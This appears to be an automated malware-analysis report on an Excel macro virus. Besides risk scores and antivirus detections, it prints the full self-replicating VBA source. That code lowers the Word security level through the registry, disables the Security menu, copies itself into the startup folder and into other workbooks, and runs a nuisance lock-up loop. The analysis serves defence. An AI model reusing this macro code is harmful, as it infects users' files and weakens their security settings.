MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV with multiple signatures indicating it is a Trojan. The VBA macro code attempts to modify the Word security level and save a file named 'Book1.' to the application startup path, suggesting an attempt to establish persistence. The macro also appears to be obfuscated and truncated, making a full analysis difficult.
Heuristics 2
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2831 bytes |
SHA-256: 55158d4f2565cc0e28605f49f0d0cae9888ecd8b2c597d8a8920ae5dfb0ca2cf |
|||
|
Detection
ClamAV:
Xls.Trojan.Chip-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'
Private Sub Workbook_Deactivate()
' Chipper By The WalruS
' v1.00 09/00
On Error Resume Next
With Application
.DisplayAlerts = 0
.ScreenUpdating = 0
.DisplayStatusBar = 0
.UserName = "The WalruS"
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Installed = Dir(Application.StartupPath & "\Book1.")
If Installed = "" Then
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
End If
Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If ActiveWB.Lines(1, 1) <> "'" Then
ActiveWB.DeleteLines 1, ActiveWB.CountofLines
ActiveWB.InsertLines 1, ThisWB.Lines(1, ThisWB.CountofLines)
Application.Caption = "Time For Chipper To Move On!"
With ActiveWorkbook
.Title = "Chipper"
.Author = "The WalruS"
End With
ActiveWorkbook.Save
End If
If Second(Now) > 58 Then
MsgBox "Shutdown Error On Previous Close", vbCritical, "Chipper"
Do
DoEvents
Randomize
If Int(Rnd * 10000) = 2 Then
Application.WindowState = xlMinimized
Application.WindowState = xlMaximized
End If
Loop
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.